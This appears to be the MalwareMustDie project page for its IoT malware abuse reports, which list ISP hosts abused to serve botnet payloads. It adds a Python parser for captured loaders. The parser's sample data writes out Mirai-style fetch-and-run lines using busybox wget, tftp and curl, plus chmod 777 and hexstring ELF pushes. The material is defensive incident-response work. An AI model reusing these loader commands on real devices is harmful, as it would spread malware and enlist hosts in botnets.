IoT Malware Abuse Project
About
Thank you for your advice and feedback on improving our report on IoT intrusion malware payloads that abuse ISP (hoster and broadband/pool) services.
These are our ongoing reports (TLP:WHITE) on IoT intrusion activity detected on our side. The data is shared so that the affected ISPs, hosters and networks can follow up on abuse incident response and prevention; its sole purpose is to serve as a reference for incident response management.
The reports are built from detected loaders (pushed either as scripts or as "hexstring" payloads) that reference the payloads downloaded from abused ISPs/hosters during IoT malware infection attempts. These loaders are captured during intrusion sessions originating from compromised botnet nodes or from the botnet's C2 infection scanners (which adversaries also call loaders or spreaders). The current monitoring targets IoT intrusion via weak telnet passwords and IoT web interface vulnerabilities.
License: BSD version 2 Simplified (FreeBSD)
Contact: Twitter @malwaremustd1e
The material and definition
The report is provided on a monthly basis; each report consists of these parts:
- The list of the most abused hoster(s).
- The list of IPs and the filenames of the IoT malware payloads they served.
- The network information for each unique IP that was used to infect.
- In addition, the P2P (peer-to-peer) IPs of IoT devices, infected by the IoT botnet, that sit in broadband pool address space.
The annual compiled data is provided as an overall database of:
- Recorded IP addresses of abused hosters that have served payloads.
- Recorded peers of IoT nodes that have served payloads.
Several notes on the served data:
- Multiple records of intrusion attempts may come from the same IP address.
- Multiple actors may operate from the same shared malicious host.
- Some of the recorded payload IP addresses may be inactive, because a botnet can keep scanning and pushing loaders without the actor's control, even after the payload host has gone away.
- Some hosts may be legitimate, since a compromised environment may have been used to spread the IoT malware infection scripts.
- Several hosts "might" belong to researchers; we cannot filter these out.
- The peer-to-peer IoT infection source IPs come from the payload request activity of IoT malware P2P infection on broadband networks; these are dial-up dynamic IP addresses, which may change on re-dial.
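The extraction and aggregation step that the description above sketches (pull the payload sources out of captured loaders, then collapse repeated attempts into the per-host list the monthly report carries), written as an added example. This is not MalwareMustDie's own collection code, which this page does not show. It assumes loaders in the common Mirai-family style: `busybox wget`, `curl` or `tftp` fetches, and binaries pushed inline as `echo -ne '\x..'` hexstrings appended to a dropper file. All IP addresses, paths and filenames in the sample are constructed; the ELF machine table is the standard `e_machine` mapping.

```python
"""Parse captured IoT loader scripts and tally the payload sources they use.

Added example for this page; not the project's own tooling. The sample loaders
below are constructed (documentation-range IPs, made-up paths and filenames).
"""
import re
from collections import defaultdict

# (source IP that pushed the loader over telnet, loader text as captured)
SAMPLE_LOADERS = [
    ("192.0.2.10", "cd /tmp; /bin/busybox wget http://198.51.100.7/bins/x86 -O .x; chmod 777 .x; ./.x telnet\n"),
    ("192.0.2.10", "cd /tmp; /bin/busybox wget http://198.51.100.7/bins/arm7 -O .a; ./.a\n"),   # same source, retried
    ("192.0.2.55", "cd /tmp; /bin/busybox tftp -g -r mips 203.0.113.9; chmod +x mips; ./mips\n"),
    ("192.0.2.77",
     "cd /tmp; echo -ne '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00' > .s;"
     " echo -ne '\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x28\\x00' >> .s;"
     " ./.s; curl http://198.51.100.7/bins/arm7 -o .b\n"),
]

# http(s)://host[:port]/path  ->  (host, path)
URL_RE = re.compile(r"https?://([0-9A-Za-z.\-]+)(?::\d+)?(/[^\s'\";]*)?")
# busybox tftp -g -r FILE HOST  ->  (file, host)
TFTP_RE = re.compile(r"tftp\s+-g\s+-r\s+(\S+)\s+([0-9A-Za-z.\-]+)")
# echo -ne '\x..\x..' >|>> FILE  ->  (hex run, redirect, target file)
HEX_RE = re.compile(r"echo\s+-ne?\s+['\"]((?:\\x[0-9a-fA-F]{2})+)['\"]\s*(>>?)\s*([^\s;]+)")

# Standard ELF e_machine values for the architectures IoT botnets usually ship.
ELF_MACHINES = {0x03: "x86", 0x08: "MIPS", 0x14: "PowerPC", 0x28: "ARM",
                0x2A: "SuperH", 0x3E: "x86-64", 0xB7: "AArch64"}


def extract_payload_sources(script):
    """Return (host, filename) pairs for every remote payload the loader fetches."""
    found = []
    for host, path in URL_RE.findall(script):
        found.append((host, path.rsplit("/", 1)[-1] if path else ""))
    for filename, host in TFTP_RE.findall(script):
        found.append((host, filename))
    return found


def decode_hexstring_loader(script):
    """Reassemble binaries pushed inline via echo -ne hexstrings.

    Returns {target_file: (is_elf, arch_or_None, size_in_bytes)}. A '>' redirect
    restarts the file; '>>' appends, which is how chunked pushes build it up.
    """
    blobs = {}
    for run, redirect, target in HEX_RE.findall(script):
        data = bytes.fromhex(run.replace("\\x", ""))
        blobs[target] = data if redirect == ">" else blobs.get(target, b"") + data
    result = {}
    for target, data in blobs.items():
        arch = None
        is_elf = data[:4] == b"\x7fELF" and len(data) >= 20
        if is_elf:
            order = "little" if data[5] == 1 else "big"   # e_ident[EI_DATA]
            arch = ELF_MACHINES.get(int.from_bytes(data[18:20], order), "unknown")
        result[target] = (is_elf, arch, len(data))
    return result


def build_report(loaders):
    """Aggregate the way the monthly list does: per payload host, the filenames it
    served and the unique source IPs that referenced it. Repeated attempts from
    the same source IP collapse into one entry (see the notes on the data)."""
    served = defaultdict(set)    # host -> payload filenames
    sources = defaultdict(set)   # host -> attacking IPs that pointed at it
    for src_ip, script in loaders:
        for host, filename in extract_payload_sources(script):
            served[host].add(filename)
            sources[host].add(src_ip)
    ranking = sorted(served, key=lambda h: (-len(sources[h]), h))
    return [(h, sorted(served[h]), sorted(sources[h])) for h in ranking]


if __name__ == "__main__":
    for row in build_report(SAMPLE_LOADERS):
        print(row)
    for _, script in SAMPLE_LOADERS:
        for target, info in decode_hexstring_loader(script).items():
            print("pushed", target, info)
```

The hexstring path matters for the "hexstring pushed loaders" mentioned above: those sessions never contact a payload host, so they show up in the pushed-binary output (file, ELF architecture, size) rather than in the abused-hoster ranking, and the source IP is the only address to record.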
Reports
Monthly Reports:
[May 2020] [June 2020] [July 2020] [August 2020] [September 2020] [October 2020] [November 2020] [December 2020]
Annual Abused IP Database:
[IoT Malware’s C2 2020 / ISP Abused IP Records] [IoT Malware’s 2020’s P2P Abused IP Records]
Recent Regional Abuse Heatmap Graphs:
Overall IoT Malware C2 in 2020
Overall P2P IoT Botnet in 2020
Graphs of C2 and P2P growth in 2020:
C2
P2P
malwaremustdie.org, 2020 | maintainer: @unixfreaxjp